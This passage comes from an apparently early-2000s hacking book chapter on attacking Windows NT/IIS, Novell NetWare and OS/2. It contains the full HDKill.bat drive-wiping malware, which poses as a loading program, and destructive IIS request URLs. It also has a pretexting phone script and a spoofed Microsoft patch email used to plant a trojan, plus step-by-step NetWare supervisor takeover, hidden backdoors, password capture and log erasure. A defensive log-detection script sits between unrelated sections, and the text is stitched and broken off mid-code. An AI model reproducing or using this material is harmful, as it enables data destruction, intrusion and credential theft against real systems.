Figure 10.9 DoS implications of the telnet hack attack
Figure 10.10 Dr Watson to the rescue
At this point, IIS could crash immediately, or crash upon the next scheduled administrative service interruption, that is, upon administrative shutdown and/or service restart. The destructive requests include the following URLs:
• www.victim.com/Scripts/Tools/Newdsn.exe?Createdatabase
• www.victim.com/Scripts/Tools/Newdsn.exe?Create
Severe Congestion
Synopsis: Custom HTTP request saturation can cause severe resource degradation.
Hack State: CPU congestion
Vulnerabilities: Windows NT 3.x and 4, Internet Information Server versions 3, 4, and 5
Breach: Using a simple underground IIS attack module (see Figure 10.11) programmed for an unlimited hit count, a remote attacker can cause severe CPU congestion, resulting in resource degradation and, ultimately, denial of service. The program shown here was written in Visual Basic and consists of a single form (see Figure 10.12).
Figure 10.11 IIS attack via custom HTTP request saturation
Figure 10.12 VB form for Main.frm
main.frm
Private Stopper&
Private Sub Command1_Click()
On Error GoTo ErrorHandler
If Command1.Caption = "begin" Then
If IsNumeric(Text2.Text) = False Then MsgBox "Please enter a valid amount!", vbExclamation, "": Text2.Text = "0": Exit Sub
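Both IIS attacks above, the destructive Newdsn.exe requests and request saturation, leave a trace in the server's W3C extended log. The following is an added example, not code from the original page or from the attack module it describes: a Python triage script that parses constructed IIS-style W3C log lines, flags any request for /Scripts/Tools/Newdsn.exe (after URL-decoding and case-folding, since IIS paths are case-insensitive), and reports every source that exceeds a per-source request count within a sliding time window. The log lines, addresses, window and threshold are assumptions made up for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed IIS W3C extended log (the #Fields line names the columns, the
# way IIS 4/5 write it). Not a real capture; hosts and addresses are made up.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2000-10-10 18:09:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-10-10 18:09:01 10.1.1.7 GET /default.htm - 200
2000-10-10 18:09:02 10.1.1.7 GET /images/logo.gif - 200
2000-10-10 18:09:03 192.0.2.44 GET /Scripts/Tools/Newdsn.exe Createdatabase 200
2000-10-10 18:09:03 192.0.2.44 GET /scripts/tools/newdsn%2Eexe Create 200
"""


def build_sample_log(flood_ip="192.0.2.99", count=300):
    """Append a constructed saturation burst: `count` hits at 30 requests/s."""
    base = datetime(2000, 10, 10, 18, 9, 5)
    lines = [SAMPLE_LOG]
    for i in range(count):
        t = base + timedelta(seconds=i // 30)
        lines.append(f"{t:%Y-%m-%d %H:%M:%S} {flood_ip} GET /default.htm - 200")
    return "\n".join(lines) + "\n"


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields, records = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line: skip it rather than crash the triage
        rec = dict(zip(fields, parts))
        rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


DESTRUCTIVE_STEM = "/scripts/tools/newdsn.exe"


def find_destructive_requests(records):
    """(client IP, query) for every hit on Newdsn.exe; the stem is URL-decoded
    and lower-cased first, so %2E-style encoding or odd casing does not hide it."""
    return [(r["c-ip"], r["cs-uri-query"]) for r in records
            if unquote(r["cs-uri-stem"]).lower() == DESTRUCTIVE_STEM]


def find_saturation(records, window=timedelta(seconds=10), threshold=100):
    """Peak request count per source IP inside any sliding `window`; returns
    the sources whose peak reaches `threshold` (both values are assumptions)."""
    by_ip = defaultdict(list)
    for r in records:
        by_ip[r["c-ip"]].append(r["ts"])
    offenders = {}
    for ip, times in by_ip.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            offenders[ip] = peak
    return offenders


if __name__ == "__main__":
    recs = parse_w3c(build_sample_log())
    print("destructive requests:", find_destructive_requests(recs))
    print("saturation sources:", find_saturation(recs))
```

On the constructed input, the two Newdsn.exe hits from 192.0.2.44 are reported and 192.0.2.99 is flagged with a peak of 300 requests inside the 10-second window; tune the window and threshold to the real traffic profile of the server before using the rate check on production logs.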
a few effortless steps:
Step 1: The Search
In this step, the attacker chooses an IT staff victim. Whether the attacker already knows the victim or searches the victim’s company Web site, it takes very little effort to perform some social engineering to reveal a target email address. Remarkably, some sites actually post IT staff support email addresses, and more remarkably, individual names, addresses, and even photos.
This sample social engineering technique was like taking candy from a baby:
• Hacker: “Good morning; my name is Joe Hacker from Microsoft. Please transfer me to your IT department. They are expecting my call, as I am responding to a support call, ticket number 110158.”
• Reception: “Oh, okay. Do you have the name of the person you are trying to reach?”
• Hacker: “No, sorry… The caller didn’t leave a name… wait, let me check… (sound of hacker typing on the keyboard) Nope, only this contact number.”
• Reception: “I’ll transfer you to Tom; he’s in IT. He’ll know who to transfer you to.”
• Tom: “Hello?”
• Hacker: “Good morning, Tom; my name is Joe Hacker, from Microsoft support. I’m responding to a support call, ticket number 110158, and I’m making this call to put your staff on our automated NT security alert list.”
• Tom: “Whom were you trying to reach?”
• Hacker: “Our terminals are down this morning; all I have is this contact number. All I need is an IT staff email address to add to our automated NT security alert list. When new patches are available for any substantiated NT vulnerabilities, the recipient will receive updates. Currently, three new patches are available in queue. Also… ” (interrupted)
• Tom: “Cool; it’s a pain trying to keep up with these patches.”
• Hacker: “It says here your primary Web server is running IIS. Which version is it?”
• Tom: “Believe it or not, it’s 3.0. We’re completely swamped, so we’ve put this on the back burner. You can use my address for the advisories; it’s tom.fooled@victim.com.”
• Hacker: “Consider it done, ticket closed Have a nice day.”
Step 2: The Alert
During this step, the attacker decides on the remote-control daemon and the accompanying message. In this particular case, the attacker chose phAse Zero:
Port: 555, 9989
Service: Ini-Killer, NeTAdmin, phAse Zero, Stealth Spy
Hacker’s Strategy: Aside from spy features and file transfer, the most important purpose of these Trojans is to destroy the target system. The only saving grace is that these daemons can only infect a system when the victim runs the setup program on the host.
Using a mail-spoofing program, as mentioned earlier in this book, the attacker’s message arrived (spoofed from Microsoft):
>On 10 Oct 2000, at 18:09, support@microsoft.com wrote:
>
>Issue
>=====
>This vulnerability involves the HTTP GET method, which is used to obtain
>information from an IIS Web server Specially malformed GET requests can
>create a denial-of-service situation that consumes all server resources,
>causing a server to “hang.” In some cases, the server can be put back into
>service by stopping and restarting IIS; in others, the server may need to
>be rebooted This situation cannot happen accidentally The malformed GET
>requests must be deliberately constructed and sent to the server It is
>important to note that this vulnerability does not allow data on the
>server to be compromised, nor does it allow any privileges on it to be usurped
>The attached patch for this vulnerability is fully supported and should be applied
> immediately, as all systems are determined to be at risk of attack Microsoft recommends
>that customers evaluate the degree of risk that this vulnerability poses to their systems,
>based on physical accessibility, network, and Internet connectivity, and other factors
>
>
>Obtaining Support on This Issue
>===============================
>This is a supported patch If you have problems installing
>this patch, or require technical assistance with this patch,
>please contact Microsoft Technical Support For information
>on contacting Microsoft Technical Support, please see
>
>For additional security-related information about Microsoft products,
>please visit http://www.microsoft.com/security
>EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND
>FITNESS FOR A PARTICULAR PURPOSE IN NO EVENT SHALL MICROSOFT
>CORPORATION OR ITS
>SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
>INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
>EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
>POSSIBILITY OF SUCH DAMAGES SOME STATES DO NOT ALLOW THE EXCLUSION
>You have received this email bulletin as a result of your registration
>to the Microsoft Product Security Notification Service You may
>unsubscribe from this email notification service at any time by sending
>an email to
MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
>The subject line and message body are not used in processing the request,
>and can be anything you like
>
>For more information on the Microsoft Security Notification Service
>please visit http://www.microsoft.com/security/bulletin.htm For
>security-related information about Microsoft products, please visit the
>Microsoft Security Advisor Web site at http://www.microsoft.com/security
Step 3: Another Successful Victim
During this step, the attacker simply waits a few days before exercising complete remote control with the phAse Zero client, as shown in Figure 10.13.
Miscellaneous Mayhem
Windows 3x, 9x, 2000
Hack State: Hard drive obliteration
File: HDKill.bat
Synopsis: Some hackers enjoy generating havoc among their victims. This nasty hard-drive killer, for example, has been attached to countless emails and distributed with game evaluations as a ReadMe.bat file. In other cases, hackers go to the trouble of breaking into systems only to add this file to the system bootup process. Careful inspection of the code will reveal its purpose.
Figure 10.13 Complete control with phAse Zero
Hdkill.bat
@echo off
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…
echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…
echo :enddc >>drivechk.bat
:testdrv
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul
granted >>c:\autoexec.bat
echo echo 2 Love is important, if you have it, truly, don't let go of it like I did! >>c:\autoexec.bat
echo echo 3 If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead >>c:\autoexec.bat
echo echo 4 If you are Australian, I feel sorry for you, accept my sympathy, you retard >>c:\autoexec.bat
echo echo 5 Don't support the following: War, Racism, Drugs and the Liberal Party.>>c:\autoexec.bat
echo echo >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat
:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul
\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul
cls
echo Initializing Variables…
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
cls
echo Initializing Variables…
echo Validating Data…
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Initializing Variables…
echo Validating Data…
echo Analyzing System Structure…
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
echo Initializing Variables…
echo Validating Data…
echo Analyzing System Structure…
echo Initializing Application…
for %%a in (%drive%) call deltree /y %%a:\* >nul
cls
echo Initializing Variables…
echo Validating Data…
echo Analyzing System Structure…
echo Initializing Application…
echo Starting Application…
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
echo
echo Q) What's the worst thing about being an egg?
echo A) You only get laid once
Synopsis: Hackers use the ProgenicMail technique to dupe victims into sending all cached system passwords. The program operates in a simple fashion, better explained on a per-file basis:
• Psetup.dat This file contains the custom configuration options:
[Setup]
Mail=(email address to forward passwords to)
Data=ProgenicMail (if left blank, the program will send passwords upon each execution)
• setup.dll This file can be replaced with any exe to be loaded to hide the true purpose of the attack. For example, the attacker may rename a joke.exe as setup.dll. The program will then launch setup.dll (really joke.exe) as it forwards all system passwords to the attacker.
Hack State: Unrecoverable file deletion
File: FFK.exe
Synopsis: After penetrating a system, hackers will attempt to delete logs and trace-back evidence with an unrecoverable file deletion utility. The purpose of this program, by PhrozeN, is to permanently delete files very fast. For example, with Fast File Killer (shown in Figure 10.14), 4,000 files of 3–150 KB take only about 30–60 seconds to delete, and the action all takes place in the background while other tasks are performed. These utilities are typically coded to completely remove files through repeated deletions or by scrambling their contents.
Figure 10.14 Fast File Killer in action
Figure 10.15 Password cracking with NTCrack
Windows NT
Hack State: Brute- force password cracking
File: NTCrack.exe
Synopsis: NTCrack is a common Underground password cracker for NT. Operating remotely or locally, an attacker can feed custom dictionaries for the attempted login username and/or password. What’s unique about this particular tool is the speed at which simulated logons can be attempted (see Figure 10.15).
Hack State: Administrative privileges exploitation
File: NTAdmin.exe
Synopsis: Local attackers exploit vulnerable NT guest accounts with NTAdmin. This Underground enigma has been coded to modify general user/guest accounts on an NT domain to acquire privileged administrative rights. The captures shown in Figure 10.16, before and after the exploit, illustrate the group modifications from Guests to Administrators.
Other Exposure
This section concludes with a compilation of Underground Microsoft NT hack attacks.
This section was prepared with help from the Nomad Mobile Research Centre (NMRC), in particular Simple Nomad and contributors: Shadowlord, Mindgame, The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller.
Figure 10.16 Hacking with NTAdmin
Common Accounts
Two accounts typically come with NT: Administrator and Guest. In numerous network environments, unpassworded Administrator and Guest accounts have been found. It is possible, however, that the system administrator has renamed the Administrator account. Hackers know that typing “NBTSTAT -A ipaddress” lists the remote machine’s NetBIOS name table, whose <03> entries include the name of the currently logged-on user; when that user is the renamed administrator, the new account name is revealed.
Passwords
• Accessing the password file The NT security database is located in %SystemRoot%\SYSTEM32\CONFIG\SAM (typically C:\WINNT\SYSTEM32\CONFIG\SAM). While the system is running, the SAM hive is held open by system components and cannot be read directly, even by an administrator. It is possible, however, that SAM.SAV copies exist that could be read to obtain password information.
• More on cracking passwords A standard Windows NT password hash is derived by converting the user’s password to Unicode (UTF-16LE), then hashing it with MD4 to get a 16-byte value; this hash value is the actual NT “password.” The hash is unsalted, so a single hash computation per candidate word can be compared against every account in the dump at once. To crack NT passwords, the username and the corresponding one-way hashes need to be extracted from the password database. This process can be painless, using hacker/programmer Jeremy Allison’s PWDUMP coupled with a password-cracking program as described earlier in this chapter.
From the Console
• Information gathering From the console on a domain controller, hackers use the following simple steps to get a list of accounts on the target machine. With a list of user accounts, they can target individual attacks:
1 From the User Manager, create a trusting relationship with the target
2 Launch NT Explorer, and right-click on any folder
3 Select Sharing
4 From the Shared window, select Add
5 From the Add menu, select the target NT server. This will reveal the entire group listing of the target.
6 Select Show Users to see the entire user listing, including full names and descriptions
Novell NetWare
Novell, Inc. (www.novell.com) is a leading provider of network operating system software for all types of corporate and private networks, including intranets, extranets, and the Internet. Climbing the corporate usage ladder quickly since 1983, Novell NetWare is currently used in 81 percent of Fortune 500 companies in the United States (according to Harte Hanks Market Intelligence). The company boasts greater security provision throughout the Net while accelerating e-business transformations.
Liabilities
Getting In
Hacking the Console
Synopsis: Simple techniques can facilitate console breaches
Hack State: Administrative privileges exploitation
Vulnerabilities: All flavors prior to version 4.11
Breach: When NetWare administrators load the NetWare loadable modules (NLMs) remote.nlm and rspx.nlm, hackers look for a program titled rconsole.exe, typically in the SYS:PUBLIC directory. At this point, attached to the same IPX network as the administrator and/or target server, the hacker loads an IPX packet sniffer and waits to capture the RCONSOLE password. Among hackers, a popular sniffer package is SpyNet (Chapter 8 describes this package more fully). If the attacker wants to conceal evidence of the hack, he or she erases the system log SYS:ETC\CONSOLE.LOG by unloading and reloading conlog.nlm. This starts a new log file over the old one, which contained the evidence.
Stealing Supervisory Rights
Synopsis: Custom coding can modify a standard login account to have supervisor equivalence
Hack State: Administrative privileges exploitation
Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x
Breach: The tempting challenge for any local hacker on a Novell network is to gain supervisory rights. Crack98.c by the renowned hacker Mnemonic sets the connection to 0 for supervisor, then creates a user object in the bindery, which must have a security-equivalence property. At that point, the program adds Supervisor to that property (SECURITY_EQUALS in the bindery), which gives the account supervisor status.
/* create the user object in the bindery; CreateBinderyObject returns 0 on success */
if (CreateBinderyObject(name, OT_USER, BF_STATIC, 0x31) == 0)
printf("The account %s has been created\n", account);
else
printf("The account %s already exists on the network\n", account);
/* give the object a SECURITY_EQUALS property, to which Supervisor is then added */
CreateProperty(account, OT_USER, "SECURITY_EQUALS", BF_STATIC | BF_SET,
Synopsis: Inside and local hackers can attempt to reveal common passwords
Hack State: Password theft
Vulnerabilities: All flavors prior to 4.1
Breach: NetCrack (Figure 10.17) by Jim O’Kane is a program that, through repeated “demon dialer” calls to the VERIFY_PASSWORD function of NetWare’s bindery API, attempts to divulge user passwords using legal queries.
Format: NETCRACK <UserID>
Common user accounts in NetWare and affiliated hardware partners include:
Hack State: Remote control
Vulnerabilities: NetWare NDS
Breach: After gaining access control to the NetWare O/S, hackers attempt to install a remote-control backdoor that may go unnoticed for some time. There are six simple steps to initiate this process:
1) In NWADMIN, highlight an existing container
2) Create a new container inside this container
3) Create a user inside this new container
a) Allow full trustee rights to this user’s own user object
b) Allow this user full trustee rights to the new container
c) Give this user supervisory equivalence
4) Modify the Access Control List (ACL) for the new user so that he or she cannot be seen
5) Adjust the Inherit Rights Filter on the new container so it cannot be seen
6) Place the new container in the IT group container to install the backdoor and to enable its login to show up in the normal tools that show active connections
Locking Files
Synopsis: Inside and local hackers can wreak havoc by modifying file usability
Hack State: File control
Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x
Breach: After gaining access to NetWare, some hackers are keen on causing chaos by locking files. This hack attack, associated with a program called Bastard by The Grenadier (Underground hacker/programmer) (Figure 10.18), is popular among disgruntled employees. Basically, upon execution, the program simply asks for the path to a file for lockdown modifications. At that point, no other user can open the file until the attacker closes Bastard.exe, logs off, or shuts down. When critical O/S operational files fall victim to this exploit, it brings networks to their knees. The program is almost too simple to use: the only requirement is that the attacker have Read access to the target file.
Figure 10.18 Locking files with Bastard
Miscellaneous Mayhem
Disappearing Disk Usage
Synopsis: Hackers can crash hard drives by filling up all available space
Hack State: System crash
Vulnerabilities: NetWare 2/3
Breach: Burn.c by the infamous hacker Jitsu-Disk depletes available disk space by forcing the server to fill an error log file at the rate of 1 MB per minute. Remnants of this particular attack may be found on many older NetWare systems. Apparently, the attacker does not have to be logged in to execute this utility.
Burn.c
#include <dos.h>
typedef unsigned int uint8;
int shreq(int f, uint8 *req, int rl, uint8 *ans, int al)
This section concludes with a compilation of Underground Novell NetWare hack attacks.
This section was prepared with help from the Nomad Mobile Research Centre (NMRC), in particular Simple Nomad and contributors: Shadowlord, Mindgame, The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller.
Accounts
• Distinguishing valid account names on Novell NetWare Any limited account should have enough access to allow you to run SYSCON, located in the SYS:PUBLIC directory. Once in, type SYSCON and press Enter. Go to User Information to see a list of all defined accounts. You will not see much information with a limited account, but you can get the account name and the user’s full name. If you’re in with any valid account, you can run USERLST.EXE and get a list of all valid accounts on the server.
• What if you don’t have access? In this case, you can’t try just any account name at the LOGIN prompt. It will ask you for a password whether the account name is valid or not; and if it is valid and you guess the wrong password, you could be letting the administrators know what you’re up to if Intruder Detection is on.
• To determine whether an account is valid, from a DOS prompt, use a local copy of MAP.EXE. After you’ve loaded the NetWare TSRs up through NETX or VLM, try to map a drive using the server name and volume SYS, for example:
MAP G:=TARGET_SERVER/SYS:APPS <enter>
• Since you are not really logged in, you will be prompted for a login ID. If it is a valid ID, you will be prompted for a password. If not, you will immediately receive an error. Of course, if there is no password for the ID you chose, you will be attached and mapped to the server.
• You can do the same thing with ATTACH.EXE:
ATTACH TARGET_SERVER/loginidtotry <enter>
• Again, if this is valid, you will be prompted for a password; if not, you’ll get an error.
• Other means to obtain supervisor access This technique is most effective in NetWare version 3.11. When the Supervisor is logged in, a program called NW-HACK.EXE does the following:
1 The Supervisor password is changed to SUPER_HACKER.
2 Every account on the server is modified to be supervisor equivalent.
• Leaving a backdoor open, redux When hackers have access to a system, they want a way back in that has supervisor equivalency. You can use SUPER.EXE, written for the express purpose of allowing a nonsupervisor user to toggle supervisor equivalency on and off. If you used NW-Hack to obtain access, you can turn on the toggle before the administrator removes your supervisory equivalency. If you gain access to a supervisor-equivalent account, give the Guest account supervisor equivalency, then log in as Guest and toggle it on as well. At this point, get back in as the original supervisor account and remove the supervisor equivalency. Now Guest can toggle on supervisor equivalency whenever convenient.
• Getting supervisor access, redux If you have two volumes or some unallocated disk space, you can use this hack to get supervisor access:
1 Dismount all volumes
2 Rename SYS: to SYSOLD:
3 Rename VOL1: (or equivalent) to SYS:; or just create a new SYS: on a new disk
4 Reboot the server
5 Mount SYS: and SYSOLD:
6 Attach to the server as Supervisor (note: login not available)
7 Rename SYSOLD:SYSTEM\NET$***.SYS to NET$****.OLD
8 Dismount volumes
9 Rename volumes back to the correct names
10 Reboot the server again
11 Log in as Supervisor, this time with no password
12 Run BINDREST
At this point, you should be logged in as the supervisor. With these privileges, you can create a new supervisor-equivalent user, then use this new user to reset the supervisor’s password.
Passwords
• Accessing the password file In NetWare, all objects and their properties are kept in the bindery files in versions 2.x and 3.x, and in the NDS database in version 4.x. An example of an object might be a printer, a group, an individual’s account, and so on. An object’s properties might include an account’s password or full username, or a group’s member list or full name. The bindery files’ attributes (or flags) in versions 2.x and 3.x are Hidden and System. These files are located on the SYS: volume in the SYSTEM subdirectory as follows:
Version 2x: NET$BIND.SYS, NET$BVAL.SYS
Version 3x: NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS
NET$BVAL.SYS and NET$VAL.SYS are the actual storage locations for passwords in versions 2.x and 3.x, respectively. In version 4.x, however, the files are physically located in a different location.
By using the RCONSOLE utility and Scan Directory option, you can see the files in SYS: _NETWARE:
VALLINCEN.DAT: License validation
• More on cracking passwords As with most insecure LANs, for purposes of this discussion, we’ll assume that Intruder Detection is turned off and that unencrypted passwords are allowed. If you have access to the console, either by standing in front of it or via RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM, or SETPWD.NLM to reset passwords simply by loading the NLM and passing command-line parameters:
NLM            ACCOUNT(S) RESET      NETWARE VERSION(S) SUPPORTED
SETSPASS.NLM   Supervisor            3.x
SETSPWD.NLM    Supervisor            3.x, 4.x
SETPWD.NLM     Any valid account     3.x, 4.x
If you can plant a password catcher or keystroke reader, you can capture passwords as they are entered into LOGIN.EXE, located in the SYS:LOGIN directory. The best place to put a keystroke capture program is in the workstation’s path, with the ATTRIB set as hidden. The advantage of that approach is that you’ll capture the password without NetWare knowing about it. An alternative is to replace LOGIN.EXE with the itsme program. This program, coupled with PROP.EXE, will create a separate property in the bindery on a version 2.x or 3.x server that contains the passwords. Here are the steps to perform when using these tools:
1 Gain access to a workstation logged in as Supervisor or equivalent (or use another technique, as described elsewhere).
2 Run the PROP.EXE file with a -C option. This creates the new property for each bindery object.
3 Replace the LOGIN.EXE in the SYS:LOGIN directory with the itsme version.
4 Keep PROP.EXE on a floppy, and check the server with any valid login after a few days.
5 To check for captured passwords, type PROP -R after logging in. This output can be redirected to a file or printer.
Accounting and Logging
• Defeating accounting Accounting is Novell’s technique for controlling and managing access to the server. The admin sets up rates based on blocks read and written, service requests, connect time, and disk storage. The account “pays” for the service by being given some number of credits, and the accounting server deducts for these items. Any valid account, including nonsupervisor accounts, can check whether Accounting is active simply by running SYSCON and attempting to access Accounting.
To defeat Accounting, you must turn it off by taking three simple steps:
1 Spoof your address. This will depend on the network interface card (NIC); typically, you can do it in the Link Driver section of the NET.CFG file by adding the following line:
NODE ADDRESS xxxxxxxxxxxx
where xxxxxxxxxxxx is the 12-digit MAC layer address
2 If you are using a backdoor, activate it with SUPER.EXE
3 Delete Accounting by running SYSCON, then selecting Accounting, Accounting Servers, and hitting the Delete key. The last entry in the NET$ACCT.DAT file will be your login, time-stamped with the spoofed node address.
• Defeating logging These steps require console and Supervisor access:
1 Type MODULES at the console Look for the CONLOG.NLM to verify active logging
2 Look on the server in SYS:ETC for a file called CONSOLE.LOG, a plain-text file that you can edit, though not while CONLOG is running.
3 Unload CONLOG at the console
4 Delete or edit the CONSOLE.LOG file to erase track evidence
5 Reload CONLOG
6 Check the CONSOLE.LOG file to ensure the owner has not changed
7 Run PURGE in the SYS:ETC directory to purge old versions of CONSOLE.LOG
Files and Directories
• Viewing hidden files Use NDIR to see hidden files and directories: NDIR *.* /S /H
• Defeating the execute-only flag If a file is flagged as execute-only, it can still be opened. Try opening the file with a program that will read in executables, and perform a Save As (to another location).
• Editing login scripts Login scripts are stored in SYS:_NETWARE. Unlike the binary files used in NDS, these files are completely editable using EDIT.NLM. Performing an RCONSOLE directory scan in SYS:_NETWARE will turn up files with extensions such as 000, which are probably login scripts. For example, suppose you found 00021440.000:
LOAD EDIT SYS:_NETWARE\00021440.000
If it’s a login script, you’ll be able to edit and save it. This completely bypasses NDS security, and is the main weakness here. As a result, you can use this to grant a user extra rights that can lead to a number of compromises, including full access to the file system of any server in the tree.
OS/2
With excellent ratings and customer feedback, it’s a mystery why this operating system hasn’t achieved greater predominance. IBM’s OS/2 (www-4.ibm.com/software/os/warp) had compatibility and stability problems until version 2.0, released in 1992. Since the addition of a new object-oriented GUI, stable DOS compatibility, and resilient Windows software compatibility, OS/2 sales have been growing steadily. IBM’s recent release, version 4, comes standard with all of the bells and whistles deemed necessary by consumers. The OS/2 System folder contains all the tools necessary to manage a PC, from folder templates to desktop schemes with drag-and-drop fonts and colors. And connectivity configuration is a walk in the park, from the Internet and file/print servers to peer networks (see Figure 10.19).
Liabilities
Tunneling
Synopsis: Defense perimeter tunnel attack through firewall and/or proxy
Figure 10.19 OS/2 modifications
Hack State: Security perimeter bypass for unauthorized access
Vulnerabilities: All flavors
Breach: Excerpt from Os2tunnel/http.c
Os2tunnel/http.c
#include <Inc Mods>
static inline ssize_t
http_method (int fd, Http_destination *dest,
Http_method method, ssize_t length)
sprintf (str, "%s:%d", dest->host_name, dest->host_port);
http_add_header (&request->header, "Host", str);
case -205: /* Reset Content */
case -206: /* Partial Content */
return 0;
case -400: /* Bad Request */
log_error ("http_error_to_errno: 400 bad request");
case -404: /* Not Found */
log_error ("http_error_to_errno: 404 not found");
return ENOENT;
case -411: /* Length Required */
log_error ("http_error_to_errno: 411 length required");
return EIO;
case -413: /* Request Entity Too Large */
log_error ("http_error_to_errno: 413 request entity too large");
return EIO;
case -505: /* HTTP Version Not Supported */
log_error ("http_error_to_errno: 505 HTTP version not supported");
return EIO;
case -100: /* Continue */
case -101: /* Switching Protocols */
case -300: /* Multiple Choices */
case -301: /* Moved Permanently */
case -302: /* Moved Temporarily */
case -303: /* See Other */
case -304: /* Not Modified */
case -305: /* Use Proxy */
case -402: /* Payment Required */
case -405: /* Method Not Allowed */
case -406: /* Not Acceptable */
case -407: /* Proxy Authentication Required */
case -408: /* Request Timeout */
case -409: /* Conflict */
case -410: /* Gone */
case -412: /* Precondition Failed */
case -414: /* Request-URI Too Long */
case -415: /* Unsupported Media Type */
case -500: /* Internal Server Error */
case -501: /* Not Implemented */
case -502: /* Bad Gateway */
case -503: /* Service Unavailable */
case -504: /* Gateway Timeout */
log_error ("http_error_to_errno: HTTP error %d", err);
return EIO;
static const char *
http_method_to_string (Http_method method)
{
switch (method)
{
case HTTP_GET: return "GET";
case HTTP_PUT: return "PUT";
case HTTP_POST: return "POST";
case HTTP_OPTIONS: return "OPTIONS";
case HTTP_HEAD: return "HEAD";
case HTTP_DELETE: return "DELETE";
case HTTP_TRACE: return "TRACE";
unsigned char *buf, *buf2;
ssize_t n, len, buf_size;
static inline Http_header *
http_alloc_header (const char *name, const char *value)
header->name = header->value = NULL;
header->name = strdup (name);
header->value = strdup (value);
if (name == NULL || value == NULL)
unsigned char buf[2];
unsigned char *data;
Http_header *h;
size_t len;
ssize_t n;
*header = NULL;
